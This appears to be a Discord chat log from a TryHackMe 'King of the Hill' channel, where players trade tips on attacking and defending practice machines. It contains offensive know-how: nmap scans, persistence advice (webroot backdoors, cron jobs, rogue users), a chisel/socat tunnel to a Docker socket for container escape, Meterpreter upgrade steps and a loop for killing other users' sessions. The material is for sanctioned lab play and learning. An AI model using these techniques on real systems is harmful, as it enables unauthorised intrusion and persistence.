#koth
1 messages · Page 69 of 1
lets' do text
sounds good
i got the music loud
same
banging super loud lmao
our neighbors just moved out a couple days ago so we have music up loud today lol
ok so how do we do this? im a nooby here
i do not, i got nothing
or are you using the attack box?
i got an attack box
you can also use the attack box
usually much faster
i will send link
and just join from there
sounds good
okay
first things first
go to your profile and click on your profile settings
your profile looks like this
click on the circle and then click on profile
ok i am there
then click on "About You"
got it
then scroll down at the bottom and set yourself up as "Intermidiate"
done
okay you might need to logout and log back in to take effect
ill send you the link now
if you want to yes
here is the link
click and join
joined
i c u
okay
so
i am not going to go in depth with all the tools we are going to use just the main basic ones
first is NMAP
checks ports and such on a network
to activate this just simply type "nmap" in your terminal
correct
done
the very first thing you ever want to do is google dork information about the network or system you are hacking. Then once you have a specific target (network or system) you then want to use a scanning tool like NMAP to see the ports and services it has running
In KOTH however, you want to immediately start without your scanning tools
ok i think i follow
I personally start with nmap and gobuster and then I drop the IP into my browser
so go back to the page and you will see our IP addresss
which is our target
so i will copy and paste this into my browser and then run nmap
listed under machine details ya?
corre ct
ok i got you
copy and paste it into your browser and then hop on your attack box and run this command: nmap -A -sC -vv -p- IP ADDRESS
no i cropped it out
so i don't get in trouble for pasting the entire ip address
i don't know the rules on this specifically yet
oooh ok
okay that means that it's not accecessible
so we need to hack it
we can use our nmap results to start there
let's see what our nmap results say
wait i think i tripped up. i didnt run that nmap -A command
okay so go to your attack box and run: nmap -A -sC -vv -p- IP ADDRESS
this nmap command has a couple switches that will get us some particular results we want
for instance i ran this already and found that 5 ports are open
no spaces in that?
ok 2 seconds
ok success! dyslexia was kicking in for a moment
no rush
man im sorry, im dipping out of this. my mood kinda got killed. i'll be up for playing again once i've learned more
You're good ! just remember learn at your pace and silence the outside 😋
really feeling that emphasis on that outside bit
don't put too much thought ! let's hack our way out of this lol im running nmap right now to see more results i can send you a spectator link so you can just watch but it won't do you much as learning rooms on your own here on THM will benefit you more
thanks @fair adder
Gave +1 Rep to @brazen atlas
just adding you to the reps 
M R . H O L M E S
ya cause naughty has exams 365*24
hey guy tofu
Recently competed in a local hackathon
1st in OS, 4th in web. Finals will be in a couple of weeks.
oooooooooooooooof
Always release your locks 😄
What say you Naughty?
Hii everybody
hi
Hi
Anyone wanna play?
Hi
Who is playing?
Might, if there are enough players, no fun with 2-3 peeps
Yeah
gg
new machine pls
anyone wana play koth
Anyone want to schedule a koth for the weekend
Sure
Saturday, 5PM CST?
yo bro how did you patch the box 🙂
locked me out
i accidently closed my nc reverse shell
My internet went down 3 seconds before the KoTH started
laga hi tha it was node.js opened on port 3000
@restive terrace hi
are you there ?
What the heck did you to the king file
what a nasty bro
hahha
anyone up for a game?
yes
lol there are 8 people in the game XDDD
The more the merrier ☺️
Salve galera beleza, matheuz security aqui e nesse vídeo iremos rootar a maquina carnage do KoTH do tryhackme!
==== Sobre o Video ====
site: https://tryhackme.com
site do koth: https://tryhackme.com/games/koth
meu perfil: https://tryhackme.com/p/MatheuZSec
×××× Redes Sociais ××××
Discord: MatheuZ Security#9509
Twitter: @Mathe...
I am once again requesting to play koth
sigam também o caminho do meu amigo matheus
@steep agate hey
I’d also like to know how he is balling on me rn
Looks like you pwn machines fast
I dont understand this ^^
As in what I’m saying or how he is being god
yo
which machine?
The one you’re on rn lol
I didn't understand, what do you mean?
You kinged in 4 minutes while I haven’t even found anything that looks mildly promising
There are no mysteries, it's very simple, when you make the machines and it falls again you already know the way, this is quite obvious. @distant coral
What
uh, if you've ever made a koth machine, and that machine is chosen again, you know how to root, that's pretty obvious...
do not you think?@distant coral
So you already did this machine once
Of course, I've won 216 times
This was my first koth
oh, okay
Ahhh broo...
Its normal
when you do koth machines more than 1 time, you know how to pwn
yes
Wait you did two koths at the SAME TIME
that's what I meant, thank you very much
Gave +1 Rep to @lucid salmon
yes me when i got the king i went to another match, is there a problem with that?
That just makes me feel worse
It's not my fault, I'm just playing koth and distracting myself, as soon as I put my nick on the king, I go to the next game, and I don't see any problem with that...
Holy crap
Im king
@steep agate
Im so noob in windows koth xD
Nice game everybody
Russia Wins
What med is?
Niko are you here?
How do you upgrade from a user powershell? I got the admin password but I don't know how to log in as them.
getting a shell with evilwinrm or psexec
and putting the creds
so evilwinrm
#feedback-and-ideas @thm you should rotate the machines btw, is bored make the same machines all time :/
@hushed palm what is wrong with ya photo man?
Well, not only do we have limited machines, but you have access to all the machines.
So, if we added a rotation, you would be restricted by the machines and I think that would be more boring
Right...
Hey bro, can I give you an idea for koth's top 10? it would be really cool if there was some kind of reward for these 10 players, after all +100 wins is a lot, it takes time, so with some kind of reward, it would encourage more players to play KoTH
what bad luck hahahaha
it's actually quite simple, to get a shell it's not that complicated
Well was a nice koth, im so noob in windows yet
@steep agate you are good, I admit that
it was a good koth i admit xD
thanks!! you are good too
Gave +1 Rep to @lucid salmon
@steep agate nice game, im going to feed myself

Hi @tacit locust @fair adder
hi
Is someone Dosing me? 
kekw I forgot use ovpn
@lucid salmon
Hi
Hop in maybe, just for fun.
Can anyone provide hints for KOTH H1:Hard machine
Where are you currently?
Have you got RCE?
H1 Hard machine is easy...
grep -rli "thm{" / 2>/dev/null
done something similiar to that is it different ? i used grep -rnw . -e 'thm{[0-9,a-z]*}' for every directory manually xD
Hi, so I am doing koth for first time, the ip is not responding and no one has submitted any flags ?
Are you connected to VPN?
On the H1: easy box there is a secret.txt binary file of 256 bytes. Has someone be able to figure out what that is?
i wanna report this dude, he plays with 2 accounts and he keeps resseting the room
please provide more detail and email to koth@tryhackme.com. (Suspected players, Game url, screenshots)
I can confirm that somewhat. He seems to have documented for himself how to get in quick (which is not illegal) but if you patch that vulnerability he immediately requests for a reset. Don’t know if he plays with 2 accounts.
🙂 Me neither. offtopic But to be honest, if you have done these machines several times it ruins the experience for those that just started out. I don't have a solution for this - I guess limiting the amount of times you can join a game to hack the same machine is too harsh. But for every machine, I wrote a readme that explains how to get in and how to patch the vulns. Especially when being root, you can basically analyze the machine and find all the vulns more easily. I guess we have to rely on the fact that it becomes boring to do the same tricks all the time 😄
true
:))
practice on this one
Can i ask there about hogwarts room?
i've a question about hogwarts room, how can i use the page that ask about three gift?
There are 3 horcruxes hidden on the target machine, if you find them and enter those into the prompt asking for 3 gifts you will get access as root
If you have to ask, you will never know
If you know, you need only ask
😄
Alright I have to say, Impressed with the last quote. room of requirement is a hint in itself
Can beginner players who just created an account join my private game?
Yes, make sure they have set the level on professional iirc in the profile settings
You can even play at level 1. The least thing you need is to set your experience level to intermediate/advanced in your profile.
https://tryhackme.com/games/koth/join/3f4101dd7942082ef5546c81
if anyone is down for the Hackers KOTH box; would be one of the few I haven't tried before 🙂
These look like a lot of fun. I watched a youtube video with what was possibly Seth Rogen doing one and it was fantastic
@woeful sundial 😅
Learned a lot from that video!
Thanks for the answer, yeah but i mean how can i give to her?
Gave +1 Rep to @placid fable
To whom?
Isn't there a service listening on one of the ports?🤔
Use netcat or telnet to connect to the service
8min
1min
@placid fable @wind fjord tanks for the advices, the next time i'll try
I've only played Hogwarts like twice, but I'm pretty sure there are better ways to get in than that tbh
KOTH anyone?
Wanna play koth? https://tryhackme.com/games/koth/join/11f6ffebb9ecd37103f12ac5
where'd you go :(
is ther any alteernate method to gain access in carnage on KOTH ??
There are more than one in each machine.
Is there a way to regain access after being kicked off a box?
to be good at koth you can't just root the box, you have to patch stuff and create ways for yourself to get back in
- Create SSH keys
- Leave a backdoor in the webroot
- Create a new user that only you know the password to
- Cron jobs
there's a whole lotta stuff you can do and experiment with
woaw
even me I don't do all of this
I should
i just wnat to ask how fast can you patch man ??
how
Dépend of the vuln
i just want to say that you r tooooo fast man
there's also a room on backdoors/setting persistence on THM.
all the best
Ty
Wich room?
Gave +1 Rep to @nova tide
I willcheck the rrom
Ty. I will check out the room
Um
Gave +1 Rep to @nova tide
I haven't tried KotH as yet always backed out but do you always get the same machine/vulnerabilities or is there rotation etc..?
Are all machines Linux or we also have Windows machines in there?
I've made a KoTH writeup
https://github.com/SDToropov/Tryhackme_KOTH/blob/main/Shrek.md
noice but instead i think you can edit /etc/sudoers with vim and force write it
i think
Im checking this, thanks ^^
Gave +1 Rep to @vapid dragon
Wow nice format! How do you make those...you know...'text inside shell pictures'? Are they just screencaps or some software to generate them?
What made you go to mysql first once you had a ssh shell?
I've made that machine a lot of times, I know the way
(Be aware that images of code are an awful accessibility practice though)
And images of text generally, for that matter
You mean is better using text?
Yeah.
Better for people with disabilities who may use something like a screenreader.
I'm inspired in Tryhackme Rooms, I like a lot the design
A write up is a way reproduce your work
But youre right, next time i'll make something better, that was my 1st writeup ever
You did an awesome job!
Thanks! ^^
You mean edit as root?
I edit that when im root, but only for patch the sudo permission for donkey
||Try editing that as a normal user||
Permission denied
then you can't i guess.
I think so
sheesh im not able to find a way to get root via the skidy homework_project in Production machine...

Not sure tho
Yeaj
I know that way, but I saw that the skidy dir has a suid file
Homework_project
No spoilers
okey
Idea:
Two teams.
Two boxes
Attack/Defend war game.
Try to root the other teams box and patch your own before getting rooted.
@nova tide @stiff egret
Thanks that's a good idea, will take into consideration and discuss in the upcoming machines. 
Gave +1 Rep to @quaint bough
My bad, didn't see you were online
I think it will promote more of a community interaction and promote friendly competition
You could even do a ladder if you have enough teams sign up
man I want to get into these kind of exercises, attack/defend, so badly but after reading that autopwn script 👀
is there skill based match making or something like that here?
I feel like I would react like the zootopia sloth once I get a hold
Starting in 15': https://tryhackme.com/games/koth/join/79ca3acd0a831df1a102aeb7
There is no skill based match making, but if you're worried about getting absolutely rolled, you can always try and put together a lobby of people who are new to KOTH
It's what I did my first few times playing
The Food and Hackers boxes are both available as their own independent rooms if you want to lab out some persistence, or just get a feel for the game
also I believe autopwn scripts are not allowed to actually be used in game
thanks!! will check them out
Gave +1 Rep to @wind fjord
1 hour
Oh nice
Public KOTH games starting in 9m30s
https://tryhackme.com/games/koth/join/78835518d67ddcdb35323d27
Anyone know that the cms on shrek machins is hackerable?
be clear vro
I'm kinda new to this, how advanced should one be for koth? Is there some easier ones to start with, or maybe team based ones where one can learn from other more experienced team members?
do some CTF rooms and search for their writeups you'll get the idea
already did a few CTF, still feels a bit scary to directly go for koth 👀
you wont know until you try
so to answer my question, I guess then there is no such thing as beginner-koth games or team based ones where you can learn from other team members?
No there isn't any. You can always try the stand alone on koth rooms on tryhackme(Food and Hackers). You can also make private games to practice if you had like.
Thanks!
Gave +1 Rep to @nova tide
anyone for Koth
anyone did carnage koth
Can i exploit the cms to obtain admin acess?
Or is only a trap?
There's also a machine named carnage in KoTH. They aren't the same machines.
i thought they were the same
stop typing holmes
ghosting your msgs 
i only know 1 method
WHAT IS THAT
you gotta find that out yourself 😛
im in hell
I recommend anyone who wants to koth just jump in and play I did it for the first time last night and it was a lot of fun
who's up for a game??
On the KOTH screen, where is the option to get to the AttackBox?
https://tryhackme.com/my-machine should always work 🙂
awesome! Didn't know about this page in the app. Thank you
Np 
got a lobby open if anyone is interested
I think they were trying to deprecate it
Tough 
Anyone is in King of the Hill
yea
Does anyone want to play KOTH?
Hi i'm wondering is editing /etc/hosts.allow and /etc/hosts.deny legal ?
Blocking IPs is not allowed if that’s what your plan was
Oh thx!
you can read rules.
in king of the hill rooms are you allowed to change password for users?
yes
im going to try king of the hill for the first time
Good luck, Have fun 
I had to go before I could complete it
Is there a way to know which "box" spawned for king of the hill? And how often do they spawn
They spawn at random from the pool.
Name of the box appears one minute before the game starts.
It appears, 1 minute before the KOTH starts, near the top-right just below the <MACHINE-IP>
Hello 👋
whats up
Sup guys
@fair adder Please keep it in English only here, this is part of Rule 8
https://tryhackme.com/games/koth/join/f7093aa53e3433142a6aa474
Machine: Tyler (Linux)
I've never played on it, I don't know the flags or the way to root access.
Whoever enters do not look at walktroughs.
How is everyone’s day
it's FRAYDAYYYY
it's 3:16 AM of Friday in my location
ah, that makes sense
What’s your thm profile ?
Ye
/p/holmes
Just holmes?
just holmes
Oh, I’m pretty sure I’ve seen you on the leaderboards
do I know you 👀
Nah
Me thm profile is
We could’ve been in the same koth game before
yeah, possible

Oh sorry I may have spoiled it
someone mind joining?
@nova tide were in the same game
yes 🙂
shadow thought it stood for king of the ham
your featured in this koth @nova tide
does this count?
haha
Or change it to jndiana Jones.
what would that mean? 😄
jndi:
naughty look at my message
you need to put your name in that file to get 10 points every minute
site takes your name from king.txt and gives you points.
!docs koth
Give that a read in your free time ^
Also a blog post linked within for some tips
It's also written on KoTH page:
Add your TryHackMe username to /root/king.txt
The longer you're king, the more points you get```
@fair adder You can ask me anything you like in here too 🙂
alright
Try looking up for chattr binary. man chattr would help.
👀
-unmute 795326240285917234 As a heads up: there are currently 109,351 people in this server. Believe it or not, they don't all want to play KoTH with you, so it comes across as incredibly arrogant that you think pinging everyone in the server is a suitable course of action.
It's also mildly insulting that you think we would be stupid enough to let you do so, and, as you've already found out, the bot doesn't appreciate you doing it very much either 🤷♂️
🔊 Unmuted Mr.Niko#0395
is anyone going to reset the box
hi
oh, that joins me to the game? uh ok guess ill give it a shot 😛
so on a windows box that doesnt have /root/king.txt ?
maybe C:\Users\Administrator
heh, i guess that file in Shares/King/king.txt is not the right one then 😛
yeah just got those creds
i suck at windows 😛
There might be an easier way to get in
got 3 accounts, scarra, fed, and poki
wait lol how did you get it so fast, like 5 minutes after i joined the room you were king
🙂
yeah the fact that i am very weak with windows is not helping 😛
I'l give you a hint the last 2min how i get in... 😆
lol
on of the ports had text freakyyyyy i thought it was a passwrd lol probably something you did
bXMxN18wMTA= 
that's my username haah
oh wow, such an old exploit i never would have thought...
yeah i def need to step up my windows game
that wsa fun though, surprised i managed to find 2 flags
good luck mate 🙂
Gave +1 Rep to @bright radish
If anyone wants to join
That's a spectator link, you need to share invite link for people to join.
It's 5 am. I was about to sleep
I have a class to attend at 09:30
No worries get some rest
Maybe later?
Sure
Ping me whenever you want to play later i will jump in.
ping me as well later, im down 🙂
RFS if here - did you remove e2fstools? Or where did you hide chattr? Curious
Gg either way
you can always upload your own chattr binary?
Does@the binary stand on its own? I uploaded the one from my kali but was throwing errors
Seemed like the whole package was gone, but maybe I just need to use busybox if that’s the case
Use a static binary compatible with the target machine 😄
Yes, I’ll have to download the source and compile one so I can be more prepared next time I suppose
Here is one I found 😄
You can set your username in the program so whoever uses it will write your username 😆
# this should work
gcc --static chattr.c -o chattr
Thanks!
I was so tilted lol, there was no way I was winning but I got a root shell with 5 mins left and couldn’t get on the board
Just how it goes
It’s a program that makes a file immutable so even root can’t change it
Sup guys
nothin
You can also download static binaries from busybox.
I was salty at first but getting into the box is really just getting in the ring
Gotta throw some punches
The real battle begins after getting root.
Mike Tyson quote applies: “everyone has a plan until you get punched in the mouth”
Let's play?
Sorry i fell asleep and just woke up.
I am working on some armaments for revenge mortal kombat
gg
Mortal Kombat? 
anyone up for koth?
Hello,
Can wild card exploit work for mv command also?
sum1 join
sum1
please
join
Thats really tough man
@brittle galleon

Hi @nova tide, it's been a while, hope you are well 🙂 I am keen to share experiences on some of the KotH boxes, are you open to discuss via DM?
sure you can DM. Might be a bit late to respond though.
No worries, it is mid-night here - about time to retire. Good to connect!
Someone come play KOTH
join game if ya want
This isn't an Invitation link but a spectator link instead
So, if you want fellow users to hop in your game; you may want to share the Invitation link
hey there, what this does mean 'Uh-oh! Only intermediate and advanced experienced leveled users can play King of the Hill.' ... <script src="https://tryhackme.com/badge/5824"></script>
oops , this is my profile badge
Change it from beginners to intermediate or advance frok your profile
Change your level like this to be able to play KoTH.
Anywhere from Intermediate to Advanced would do.
@rotund smelt
Thanks alot
Gave +1 Rep to @stiff egret
Would getting flags after a minute the game has started signify cheating?
Because by that time the nmap scan either hasn't finished or says that the host isn't up yet
That is a very big problem with koth because not only are the flags same but after solving a machine one or two times, anyone could write a script that takes you to root in no time at all
Actually, since the flags are static, and same everytime, people store previous flags.
It is not a gentlemen's way of playing, but yes, it is also not cheating.
AutoPwns are specifically not allowed in KoTH, it's a shady area to talk upon, but as said, it's a learning game and cheating in this, you are cheating with yourself.
The flags issue exists and as far as I know, some work is going on to improve that.
koth is only really fun if it's everyone's first time doing the machine imo
Agreed, OR if everyone decides to play fair, i.e. private matches, and then it's a race for king. Which imo is a fun thing to do.
I liked playing koth games but it quickly got boring because I'd subconsciously memorised all the steps
It's a game, it's not about who hacks first, it's about if you had fun kicking them offf the machine, or if you heard them shouting in voice chat when you urandom'ed or nyancat'ed their machine.
It's about hacking alright, but tryhackme.com/games/koth
Yeah one time a user piped some mean text in my terminal session
Had to kill the session but fun indeed
Yes, that both teaches stuff and makes you laugh out loud at the same time.
It's way more fun if everyone is in vc, because then you hear the shouts and see that your bomb landed 😆
🙂
Ohhh that makes sense
.
.
.
@stiff egret you wanna fight? xD
Yes
lmao
bot wants you ded i guess
8Ball <What-to-ask:Text>
Invalid arguments provided: Not enough arguments passed
-8ball is naughty cracked?
Yes
I mean look at the odds
yeah keep deleting the messages like no one will know.
dude
what do you guys use to find flag ? Because i got root on Fortune and run different command (grep -Ri thm 2>/dev/null
find / -name flag 2>/dev/null, and many more...) But i can 't find the last 2 flags...
Some flags are specifically harder to find as they also hold more points. Same regex will not work for all.
Plus some flags might not be in standard format, in some machines flags are base* encoded to make it harder to find. Try to check locations that an attacker would think they'll find juicy files. Most likely flags are placed in practical places. But eh well, creators can be evil and hide flags particularly to make it very complex. In that scenario, the points are also very high.
Long story short, it's random.
13 min left
juun's relative? 🤔
lol
I received the credentials ||neville:#le#zzmns0bxrqcfe53hgg3vw|| in the hogwarts thm koth however when trying to login via ssh with these values it says incorrect password, can anyone explain this to me I was trying for the whole challenge to get in and ran out of time
I tried cracking the hash using john but it didnt work as it said it wasnt a valid hash
other players might have changed the password
Maybe but i was only against one other player who had 0 flags and 0 king time
I don't know if you tried the password in the same game, they change every game.
Other than that, the password is a mix of irritating characters, maybe make sure you are entering it right.
I'd suggest using sshpass -p 'password' to input password. (very bad security practice but eh) this will make sure you are entering the password right.
Plus, as @errant marten suggested, neville's password is fairly easy to get and hence someone might've changed it before you.
who's Omni or below level that's interested in KOTH?
Signify so i can quickly create a room
I saw this people in the public game, please let me know if y'all active so i dont just waste time please.
@fair adder Can you try to only post the invite once for each game please? Walls of links with embeds take up a lot of space
@quiet schooner Sorry Not happing Again
good fight @fair adder
Thank u
were you using a bash script to comb for ssh logins and kill the processes with pids or doing it manually?
The second rule says "only stop a service if it can't be patched other way"
That means someone can just take them all down and say I didn't find any other way?
Because I'm doing a Koth right now and at the beginning I saw telnet, ssh, http open but after one guy became king none are available anymore (I did several nmap -p- scans) 😅
if can't be patched. Not if you don't know how to patch it.
If you believe someone broke the rules email at koth@tryhackme.com with some screenshots,game id,suspected person's name.
is it against the rules to kill shell sessions?
happened to me, I mean I won anyway but I was curious
Killing shell sessions is allowed, but spamming/scripting it is not
But people who don't spend time patching will just spam it because that's all they know how to do 🤷♂️
Source: was that person at one point
someone deleted the backup.sh
and no one is voting for reset

@viscid parrot bro
really??
evil play style is evil
"If you believe someone broke the rules email at koth@tryhackme.com with some screenshots,game id,suspected person's name."
copied from a few msgs above
nope he just patched it 
and there's no other way of getting root except that .sh file
and no one is voting for reset
GG
baron samedit exploit mostly works for root bcz thm machines have outdated sudo
I believe there's more than one method for root in the machines anyways
There are atleast 3-4 ways to get root for each KoTH machine
Resets should only be used when the machine is broken not when patched.
I have played fair few games and have yet to see the reset function used as intended. More often than not it smells of frustration and despair 😉
"fair few games"
👀
does that also count private games??? or only public ones???
dunno if private games award points in the same manner as public ones
private games are a premium feature
if it does someone could easily inflate their points... but would assume that might make them get reported for abuse maybe
yeh but that would get noticed pretty quickly I think if someone just starts wining a lot of private games suddenly
indeeds
You recently started seeing that and i have been seeing that for past 2 years before when it wasn't even in the rules 😄
they are not
only public games count.
Ohhh
thanks for the confirmation
Gave +1 Rep to @nova tide
You can start a private game as a normal user, but premium users can select the desired machine while others get a random one.
Ah confused it
That dude gained 50 odd points in last 10-15 days
isnt it kind of lame if premium users can select the desired machine..?
it would be easy to just go through and learn all the vulns, build a script to patch them and randomize the order and delay of the patches
it would take maybe 3-5 matches to find them then only an hour or two to make the script lol
I dont know how big the machine pool is though
i think this thing already exist autopwner or something
There's not enough machines for it to matter enough
not big enough unfortunately
even if people don't have an autopwn it only takes a few games and very basic notes to be able to pwn most of the machines before your opponents' nmap scans finish
try hogwarts
Anyone playing?
just rustscan then the usual really
goodluck
hardest linux box for me 
Attacking others isn't allowed even in these situations? 😂
Seems like they have changed the flags, you can report them at koth@tryhackme.com
Hello, I never tried koth. I'm pretty sure I would manage to find vulns and exploit them but I wouldn't know where to start to patch them ^^ any advice ? Or maybe I should go through Blue team path ?
!docs koth
This one to be exact: https://help.tryhackme.com/king-of-the-hill
Thank you, I found the blog post with tips and tricks
Gave +1 Rep to @nova tide
send me @pliant rapids
Time for a little break from KotH! Playing KotH has been extremely educational, even therapeutic at times, during this Covid-19 ordeal 😉 Just wanted to say thanks to all. This community is pretty awesome and that is because of all of you!
Can anyone suggest me which linux machine is good for beginners to play KOTH?
probably the easiest of all to begin with
Space Jam is pretty beginner friendly and linux @quartz valley
i'm playing it now
Thanks Ben, will try that today.
Gave +1 Rep to @brazen cloud
best of luck (:
Can anyone help me to make some tests? i just need someone to enter this room here, it needs two people to start https://tryhackme.com/games/koth/39109
- You need to paste the invite link, top right, options you'll know when you see it
https://tryhackme.com/games/koth/join/5c2884c536d8d9ecf90f9437 Public, starts in 17mins, only me and 1 other player atm
6m30s!
2?
- Naughty nub
Food is available standalone to practice, and is also quite easy
Especially as more CVEs have come out that affect the boxes, particularly privilege escalation
Oh wow I was gonna ask if y'all patched it but RIP
I can't speak for the other box creators
I also can't speak for THM as a whole
🤷♂️
if anyone wants to join a public Koth it will start in 7minutes 😁
🤣 🤣 🤣
im back, had taken a break, because of the tests of school competitions
just saw that you're the guy at number 2, welcome back 🙂
Thanks
i was in koth but i had to leave, i have to tidy my bookshelf
there are these books and several others on physics, chemistry, harry potter, among others
@prisma roost
yeh man, had my exams last month so couldn't do thm and ... well it sucked
end and beginning of the year and always very busy
@stiff egret
ah, big fan of books in general, got a fair collection myself. Always nice to see people reading novels
I love reading books as much as harry potter, sherlock, among many others
Very very nice to hear! I've been reading The Silent patient recently, would recc def.
I've never heard of this book before, I'll check it out later.
I think here in Brazil they don't have this book, in pt-br
Ah, yeah, I see you are reading translated versions of them?
yes, they are translated books
cool keyboard 😄
Well, if you decide to try en- books, then it's one worthy piece
MAWTERIAL GURL
are those... passwords written on notes?
It's a good idea
English books I read more when it has something to do with hacking
I'll just say that I am glad over my camera quality.
I'm going to record a video of shell x shell techniques that can also be set useful in a koth
@royal pilot u there mate ?
:>
any idea how to change the permission?
google icacls
or if you want the easy win
just del king.txt and echo username > king.txt
thanks ❤️🔥
Gave +1 Rep to @prisma roost
won
congrats 🎊
bruh use shell_to_meterpreter 🙂
attrib -R king.txt
infloop is typing
Here's that earlier post @prisma roost
# on your system
# start the chisel server
chisel server -R -p 3000
# on target machine
# get a port to communicate with the socket file
socat tcp-l:3275,fork,reuseaddr unix-connect:/var/run/docker.sock &!
# connect to the chisel server
chisel client <your-IP>:<port> R:3275:localhost:3275
# on your system
# use docker
docker -H :3275 ...
I have written these from mere memory, so beware of any incorrect flags 😅
That's how I go with koth-H1:Hard machine (one of the 4 containers), getting that port on my system with chisel following a simple docker escape
Gave +1 Rep to @placid fable
Learnt a lot from wreath🙂
Yeh, didn't know much about tunnelling before wreath as well
How am I supposed to do that?
I won't be amazed if there's a static binary for docker
Edit: There is, https://download.docker.com/linux/static/stable/x86_64/
What's the last line docker -H :3275 doing
Haven't you forwarded the port to your local machine already?
Within msfconsole, use Ctrl-Z to background the plain shell
And try the following -
use post/multi/manage/shell_to_meterpreter
set SESSION <session-id>
run
I exploited the machine using a python script
By default it uses the /var/run/docker.sock on your system
So to use a custom one, that too on another machine, I got a local port to use it with
docker -H localhost:3275 that's what we have started locally from the chisel client
I just setup payload windows meterpreter but ig it'd depend on the type of shell you're getting back
I see, nice trick with docker and chisel,
E get one guy wey be jcoscia for here, If i sabi your papa..... Na amadioha go settle our fight, You too dey bully for KOTH, ah!
Ok wtf is “jcoscia”?????
I know you are trying to prestige but it’s ruining the fun for others
By playing the boxes? I leave most things unpatched...
But u change the ssh passwords?
Of course, changing creds is the easiest way to keep people out. You may want to give https://tryhackme.com/resources/blog/guide-to-king-of-the-hill a read
There's always more than one way into a box...
(and you can get there first and do it yourself)
You have a good point I have no more excuses/defenses therefore I am concluding to defeat
- Defeated male leaves *
lol man, you can change ssh keys yes, there are several ways for you to invade the machine...
Lmaoooo yeah, that’s why I self deleted
Defeated*
@limber rune what box?
It was panda I think
LOL
Ikrrrrrr
man this box has more than 1 way to invade, just try to find others
I understand
Thank you for your understanding
:)
- defeated male leaves *
could release more koth machines
Could
I'm going to record a video of shell x shell techniques that can also be set useful in a koth
for example hide a pid without hooking
Yeaaaahhhh
To prevent being kicked off a machine?
yes I will, and why these last few days are running for me
Noice!
Yes
Can u send me link to the video or write up if u make it?
if the enemy doesn't know your PID/PTS, there's no way he can kick you out of the machine, unless he takes permissions from a binary (but that's against the rules, changing binaries, except chattr )
I will still post on my youtube channel in the future, now it's too busy for me
Yeah
Cause the second I got into panda, I got kicked off by jcoscia
Alright bet
did you log in with ssh? he could use a ps aux | grep pts, or w, and see your pts, and kick you out of the machine, so it saves time changing the password
so he should be waiting for you to kick you out
Probably
@molten mason what level are you actually?
Or maybe their just good at the game
Lmaoooooo
probably he had some automated script in bash, or even oneline, to get you off the machine, this is relatively easy to do, for example: while true; do pkill -t -9 pts/#; done
I'm not scripting anything, I just watch closely for shells and check logs
and I'm 0x2 but just enjoy koth
Dang ok ok
Can you also background it using the “&” so you can hunt for flags as well?
I also like to see the logs, but I'm invisible, so no one knows I'm on the machine
you could use things like: grep -rli thm{ / 2>/dev/null
Ooooohh
find / -name flag* 2>/dev/null
etc
there are a lot of cool things to do in a machine instead of kicking others
That’s the one I usually use
AGREED
I'ts very interesting
:)
Anyway, I'm going out here, I'm going to finish doing things here at home, see you later!
Bye!
Bye!
@molten masonDo you ever sleep?
Sleep is just caffeine deficiency.
sleep for weak
just repeat the cycle again :)
they can't reset the box if you reset it first
THE REAL LEGEND.
@molten masonHow long have you been doing cyber security?
I've been interested in security since I was a teen, but I haven't actually worked in the field yet (working on that lol)
Ah fair. Seems like there'll be no issue with that
Long time, totally rusty, let's goooo
ah shit, Hogwarts again, I hate this machine.
next level patching going on..
jcoscia is very good. Props to them
now I remember why I hated Hogwarts
most def, from what I can see, good by the rules patching.
almost all ports moved up 😄
shut up naughty
ironic when the writer fails to break it
dude you have no idea how proud I am of that poem, that's original content yk
can't believe just lost in the box I created, I need to get back in the game
I hope, I didn't break any rules 😄
All services are running, some even patched 🤔
Told you no? Nice patching (:
I had parrot and nyancat prepared for you guys 😅
It was fun,I haven't given up yet, but really fun playing after a long time
There is this line from netstat -plant
tcp 0 1 10.10.76.19:54054 34.253.229.19:80 SYN_SENT 17670/http
How is there 34.253...?
Interesting
That one is - ec2-34-241-117-189.eu-west-1.compute.amazonaws.com
There's now another one 91.189.88.152 - actiontoad.canonical.com 😅
Anyways
Whoever patched it, kudos, everyone this is how you play king of the hill.
Hehehe that is awesome
Famous nyancat
Ikr, was super impressed by the patching ngl.
Not the methods, I mean by the book someone would argue to actually fix the php code, but it was just cooler xD

@molten mason Brother, you gave me and my frens here some troubles but you played well.... Respect man
Hi sir, create more machine.... some are using the familiar advantage😂
why you attack me like that?
What can I do if someone uses chattr on king.txt & remove chattr?
you can upload your own chattr binary. You can find it from busybox
I did that , but it says something is not matching
You need to upload a static binary not the one from your machine.
Oww.. how can I do that?
google busybox binaries.
Ok
Check pins
Is it allowed to run a honeypot, and run the real service (Ex. sshd) on another port? Asking for a friend.
As long as the real ssh is on, I don't see any problem.
Okay, thanks! >:)
out of date
Hi, I just wonder when do I get access to koth or more how do I get access. Cause I get the notification that says only intermediate or experience members. When do I become that?
You can set that at https://tryhackme.com/profile -> About you -> scroll to bottom
are we allowed to change ssh ports?
Yes
thank you
no, in the rules it says that it is forbidden to change the ssh ports
# Rule 2 - KoTH
Only stop a service if it can't be patched any other way. Services should remain available for “genuine users of the box” if at all possible. Changing ports of services is allowed. (Try to keep the machines in as original state as possible.)
oh yeah, didn't know
😅
If you go into the discord search and search “from:Naughty in:koth new”, you’ll see what happens every time this question is asked 
Can anyone offer me a tip on the shrek room's shrek is like an onion flag? It looks like base64 but once decoded I don't recognise it as anything. There seems to be a mixture of hex characters and other stuff. I've played around with it quite a bit but not cracked it. I'd love a hint please.
Have you ever seen shrek?
That was to you.
I'm going to go out on a limb here and assume it has layers.
Thanks, yes a while back, but not so I remember any clues from the dialogue. I was expecting to need to apply multiple decodes to it, but I'm failing to see what the next one might be. Is there something more specific about the reference to layers?
Gave +1 Rep to @tardy sand
There was a git repo with a python script that you put a string and the script will tell you what is
I don't remember the name, when I'll get home I'll tell you
